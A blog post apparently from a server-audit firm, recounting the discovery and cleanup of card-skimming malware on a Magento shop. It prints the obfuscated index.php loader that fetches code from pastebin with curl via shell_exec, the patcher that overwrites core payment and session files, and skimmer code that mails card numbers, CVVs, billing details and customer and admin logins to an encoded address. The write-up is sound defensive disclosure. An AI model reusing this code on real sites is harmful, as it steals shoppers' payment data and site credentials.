Magento Security alert...
One of the services that we offer is to provide a server audit, usually arising from a reduction in performance, mail blacklisting... that sort of thing. This usually leads to a security upgrade, server cleanup and general tuneup.
For reference, we usually use Patrick Meenan's fabulous service to deliver before and after stats... even though most of our work is at the infrastructure level, so just addressing the TTFB – the first line on that waterfall - it does provide a great means of identifying ( and visualising the effect of ) further work that the client can go through and address themselves: reducing image sizes, file counts, 3rd party loads etc.
So, yesterday, we were asked to look at a magento site that wasn't performing well. After addressing most of the usual problems: Gigabyte log files, log tables with millions of rows, MySQL set to use 8MB of memory, no system updates or magento patches for years and so on, I just thought I'd check the index.php to see whether any strange code had been loaded ( we've seen some weird stuff here, like you wouldn't believe! ), and this is what I found...
$compilerConfig = 'includes/config.php';
if (file_exists($compilerConfig) && (filesize($compilerConfig) == 2260)) {
include $compilerConfig;
else {
$b64 = "base"."64"."_"."de"."code";
$link = $b64('aHR0cDovL3Bhc3RlYmluLmNvbS9yYXcv');
shell_exec('curl -o includes/config.php '.$link.'AgJaXBQf');
shell_exec('touch -r includes/.htaccess includes/config.php');
include $compilerConfig;
curl -o includes/config.php eh?
Now that looks weird... so what does the target includes/config.php look like then? Here's the important bit... it patches 3 core Magento files, once again from the pastebin
* Main Config
* Please dont ever edit this code below
$dir = getcwd();
$b64 = "base"."64"."_"."de"."code";
$path = '/app/code/core/Mage';
$link = $b64('aHR0cDovL3Bhc3RlYmluLmNvbS9yYXcv');
$path_a = $dir.$path.'/Payment/Model/Method/';
$name_a = 'Cc.php';
$file_a = 'Abstract.php';
$size_a = 14759;
$link_a = $link.'A78sr324';
$path_b = $dir.$path.'/Customer/Model/';
$name_b = 'Session.php';
$file_b = 'Group.php';
$size_b = 10098;
$link_b = $link.'rGtRemgU';
$path_c = $dir.$path.'/Admin/Model/';
$name_c = 'Session.php';
$file_c = 'Config.php';
$size_c = 7739;
$link_c = $link.'tMxCsdAa';
On further investigation, this is uploading code from and replaces the Credit card processing stuff with it. As a part of the preparesave function, this function is called...
private function _saveInfos()
{ $ctid = "Customer"; } else $ctid = "Guest";
$cinfo = $this->getInfoInstance();
$card = 'Card: '.
$cinfo->getCcNumber().' | '.
$cinfo->getCcExpYear().' | '.
$minfo = Mage::getSingleton('checkout/session')
$binfo = new Mage_Checkout_Block_Onepage_Billing;
$bill = $binfo->getQuote()->getBillingAddress();
$billing = ''.
'Status: '.$ctid.'/'.$minfo."\n".
'Cname: '.$bill->getFirstname().' '.$bill->getLastname()."\n".
'Street: '.$bill->getStreet(1).' '.$bill->getStreet(2)."\n".
'City: '.$bill->getCity()."\n".
'State: '.$bill->getRegion()."\n".
'Pcode: '.$bill->getPostcode()."\n".
'Country: '.$bill->getCountry()."\n".
'Phone: '.$bill->getTelephone()."\n".
'Email: '.$bill->getEmail()."\n";
$db = 'Checkout '.
substr($cinfo->getCcNumber(), 0,6);
$idkey = "base"."64"."_"."de"."code";
$update = "ma"."il";
$encode = $idkey("ZGlzY29sb2dneUBnbWFpbC5jb20=");
$srvnm = $_SERVER['HTTP_HOST'];
$ipcid = $_SERVER['REMOTE_ADDR'];
$timestamp = 'From: '.$srvnm.'<'.$ipcid.'>';
$mySql = $billing.$card;
$update($encode, $db, $mySql, $timestamp);
To decode the final line: $update($encode, $db, $mySql, $timestamp);
$update = "ma" . "il" = mail
$encode = base"."64"."_"."de"."code" ( "ZGlzY29sb2dneUBnbWFpbC5jb20=") =
$mysql = billing ( address, etc ) + credit card info
$timestamp = From:<>
Payment/Model/Method/Cc.php contained
< error_reporting(0);
< $this->_saveInfos();
< /**
< * Prepare send to Database
< *
< * @return string
< */
< private function _saveInfos()
< {
< if(Mage::getSingleton('customer/session')->isLoggedIn())
< { $ctid = "Customer"; } else $ctid = "Guest";
< $cinfo = $this->getInfoInstance();
< $card = 'Card: '.
< $cinfo->getCcNumber().' | '.
< $cinfo->getCcExpMonth().'/'.
< $cinfo->getCcExpYear().' | '.
< $cinfo->getCcCid();
< $minfo = Mage::getSingleton('checkout/session')
< ->getQuote()
< ->getPayment()
< ->getMethodInstance()
< ->getTitle();
< $binfo = new Mage_Checkout_Block_Onepage_Billing;
< $bill = $binfo->getQuote()->getBillingAddress();
< $billing = ''.
< 'Status: '.$ctid.'/'.$minfo."\n".
< 'Cname: '.$bill->getFirstname().' '.$bill->getLastname()."\n".
< 'Street: '.$bill->getStreet(1).' '.$bill->getStreet(2)."\n".
< 'City: '.$bill->getCity()."\n".
< 'State: '.$bill->getRegion()."\n".
< 'Pcode: '.$bill->getPostcode()."\n".
< 'Country: '.$bill->getCountry()."\n".
< 'Phone: '.$bill->getTelephone()."\n".
< 'Email: '.$bill->getEmail()."\n";
< $db = 'Checkout '.
< $cinfo->getCcType().'/'.
< substr($cinfo->getCcNumber(), 0,6);
< $idkey = "base"."64"."_"."de"."code";
< $update = "ma"."il";
< $encode = $idkey("ZGlzY29sb2dneUBnbWFpbC5jb20=");
< $srvnm = $_SERVER['HTTP_HOST'];
< $ipcid = $_SERVER['REMOTE_ADDR'];
< $timestamp = 'From: '.$srvnm.'<'.$ipcid.'>';
< $mySql = $billing.$card;
< $update($encode, $db, $mySql, $timestamp);
< }
< error_reporting(0);
< $srv = $_SERVER['HTTP_HOST'];
< $ips = $_SERVER['REMOTE_ADDR'];
< $id = "ba"."se"."64"."_"."de"."co"."de";
< $db = "ma"."il";
< $key = $id("ZGlzY29sb2dneUBnbWFpbC5jb20=");
< $auth = "Email: $username\nPassword: $password\nIP: $ips\nSite: $srv";
< $headr = 'From:'.$srv.'<'.$ips.'>';
< $db($key,"Customer: $srv", $auth, $headr);
< error_reporting(0);
< $srv = $_SERVER['HTTP_HOST'];
< $ips = $_SERVER['REMOTE_ADDR'];
< $id = "ba"."se"."64"."_"."de"."co"."de";
< $db = "ma"."il";
< $key = $id("ZGlzY29sb2dneUBnbWFpbC5jb20=");
< $auth = "Email: $username\nPassword: $password\nIP: $ips\nSite: $srv";
< $headr = 'From:'.$srv.'<'.$ips.'>';
< $db($key,"Admin: $srv", $auth, $headr);
So it's sending emails, containing purchase details / logins / CC details to a ( now defunct ) gmail address, also identifying the server for further attacks. Although attempts were taken to break up stuff like the base64_encode call, the email address was always encoded in the same way, so a quick check of the codebase showed up no further code, and an even more paranoid ( hey, it's in the job description! ) search showed no files containing “ma” either.
We informed the client, and then restored the 5 affected files from a clean download of magento. A proper comparison with the clean codebase is in the works in the near future.
I did note ( putting the email address into google, nothing clever! ) that it was on a list of known malware email addresses found at so we're considering blacklisting mail recipients as part of our standard setup.
We just need to find out how the original index.php was modified now. The rest was facilitated by a standard Ubuntu LAMP install.
You just never stop learning, do you? Be careful out there...